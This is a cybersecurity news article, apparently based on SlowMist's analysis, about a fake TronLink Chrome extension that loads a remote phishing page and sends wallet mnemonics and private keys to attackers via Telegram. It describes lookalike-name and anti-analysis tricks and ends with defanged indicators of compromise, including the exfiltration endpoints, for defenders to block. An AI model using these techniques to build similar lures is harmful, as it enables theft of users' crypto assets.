Malicious Chrome MV3 Extension Impersonates TronLink to Steal Crypto Wallet Credentials

HomeCyber Security News Malicious Chrome MV3 Extension Impersonates TronLink to Steal Crypto Wallet Credentials By Tushar Subhra Dutta May 12, 2026 A fake Chrome browser extension pretending to be the popular TronLink crypto wallet has been caught stealing sensitive wallet credentials from unsuspecting users. The malicious extension operates silently in the background, harvesting mnemonic phrases, private keys, and passwords before forwarding them straight to attackers in real time. This campaign is more dangerous than most because it does not look suspicious at first glance. The fake extension appeared on the Chrome Web Store with a claimed install count of over one million users and a 4.5-star rating backed by hundreds of reviews. Many victims likely installed it without hesitation, believing it was a completely legitimate and widely used tool within the TRON ecosystem. Analysts at SlowMist, a blockchain-focused security firm, identified and documented this threat after their MistEye monitoring system flagged the extension as a high-risk phishing sample. The MistEye system triggered an immediate alert and notified clients once the fake extension and its connected phishing page were both confirmed. SlowMist published their findings to help the broader community identify and protect against this specific attack. What makes this attack unusual is how the attackers likely took over an already popular and legitimate extension listing on the Chrome Web Store. By inheriting the store reputation of an existing extension, they avoided the hard work of building credibility from scratch. The displayed ratings and user counts belonged to the original listing, so nothing appeared forged on the surface. The impact of this campaign can be severe and nearly immediate. Once a user enters their wallet credentials into the fake interface, those details are forwarded to attacker-controlled accounts without any delay. Any wallet accessed through this extension should be considered fully compromised, with digital assets at serious risk of theft. MV3 Extension Impersonates TronLink The attack works in two connected layers designed to stay hidden from security tools. The first layer is the Chrome extension itself, which appears to be a harmless blockchain explorer requesting only minimal permissions. The second layer is a remote phishing page that loads inside the extension popup and performs all the actual credential theft. When a user installs the extension and clicks its icon, the popup quietly checks whether a remote server is available, then loads a phishing page inside an embedded frame. This page is a near-perfect copy of the real TronLink web wallet, and most users would not notice the difference. UI Impersonation (Source – Medium) The extension also uses hidden Unicode characters and Cyrillic lookalike letters to make its name visually resemble “TronLink,” helping it slip past automated store review checks. The phishing page collects every piece of sensitive data a user enters, including mnemonic phrases, private keys, keystore files, and passwords. It then packages this data and sends it directly to the attacker through the Telegram messaging platform, entirely without any visible sign to the victim. Evasion Tactics and What Users Should Do The attackers built several protection layers around their phishing page to obstruct security researchers. The page blocks right-clicking, disables text selection, intercepts developer tools shortcuts, and redirects suspected bots or analysts to a blank page. It also uses geographic detection, automatically redirecting Russian-language users to a separate domain, likely to reduce the risk of drawing local law enforcement attention. Users who installed this extension should remove it from Chrome immediately and clear all site data and local storage tied to it. If any wallet credentials were entered into the popup, those wallets should be treated as fully compromised, and all funds should be moved to a new wallet created on a trusted device right away. Security teams are advised to block the domain tronfind-api.tronfindexplorer.com across DNS, proxy, and endpoint detection logs. Monitoring for traffic patterns targeting specific API paths used by the phishing backend can help detect exposure. Restricting unapproved browser extensions through group policy or device management controls is a strong long-term step that meaningfully reduces this type of risk. Indicators of Compromise (IoCs):- Type Indicator Description Domain tronfind-api[.]tronfindexplorer[.]com Primary malicious domain; remote UI loading endpoint and credential theft backend Domain trx-scan-explorer[.]org Secondary malicious domain; redirect target for Russian-region users URL https[:]//tronfind-api[.]tronfindexplorer[.]com/ Remote phishing page root URL URL https[:]//tronfind-api[.]tronfindexplorer[.]com/api/data/words Credential exfiltration endpoint URL https[:]//tronfind-api[.]tronfindexplorer[.]com/api/visitor/track Visitor behavior tracking endpoint URL https[:]//tronfind-api[.]tronfindexplorer[.]com/api/visitor/create Visitor creation endpoint URL https[:]//tronfind-api[.]tronfindexplorer[.]com/api/visitor/enrich Visitor enrichment/blocking check endpoint URL https[:]//tronfind-api[.]tronfindexplorer[.]com/api/visitor/sync Visitor sync/blocking check endpoint Telegram chat_id 8334454422 Attacker-controlled Telegram account receiving stolen credentials Chrome Extension ID ekjidonhjmneoompmjbjofpjmhklpjdd Malicious extension ID on Chrome Web Store MD5 ce612d027e631d6633582227eb29002f Hash of malicious extension file SHA1 94d651b42355f2b0765a7435e5a5927623807225 Hash of malicious extension file SHA256 6b4a4b64e6f969017cb3a9a71dd3038ddf32b989e5342dbbe36650d5802f2ee4 Malicious file: index.html SHA256 b84b89f0a1b7f00431274ac676104acaaa73d440e5731161d1077e733014cc29 Malicious file: 27-a530a8c5aa9059e0.js SHA256 0cbf4f21cf157227d2c3fba80b64e1f4c3f9d2cc0bf926e024252c35e93edd5a Malicious JavaScript file (filename not specified) Filename index.html Malicious extension popup entry file Filename assets/index.html-2KXeQB-c.js Core malicious JavaScript logic file within extension package Filename 27-a530a8c5aa9059e0.js Malicious JavaScript file associated with phishing page Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM. Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google. Tags cyber security cyber security news Copy URL Linkedin Twitter ReddIt Telegram Tushar Subhra Dutta Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics. Trending News Cerberus Stalkerware on Google Play Leverages Accessibility Abuse and Firebase for Remote Control JDownloader Downloader Hacked to Infect Users With New Python RAT Hackers Use Microsoft Teams to Steal Credentials and Manipulate MFA CloudZ RAT Abuses Microsoft Phone Link to Steal SMS OTPs and Mobile Notifications New NWHStealer Delivery Chain Uses Bun Loader, Anti-VM Checks, and Encrypted C2 Latest News Chrome Claude’s Chrome Extension Vulnerability Allows Malicious Extensions to Steal Gmail and Drive Data Cyber Security News Critical PHP SOAP Extension Vulnerabilities Enables Remote Code Execution Attacks Cyber Security News Magecart Hackers Abuse Google Tag Manager to Inject Credit Card Skimmers Cyber Security News TeamPCP Compromised Checkmarx Jenkins AST Plugin Following KICS Supply Chain Attack Android PoC Exploit Released for Android Zero-Click Vulnerability that Enables Remote Shell Access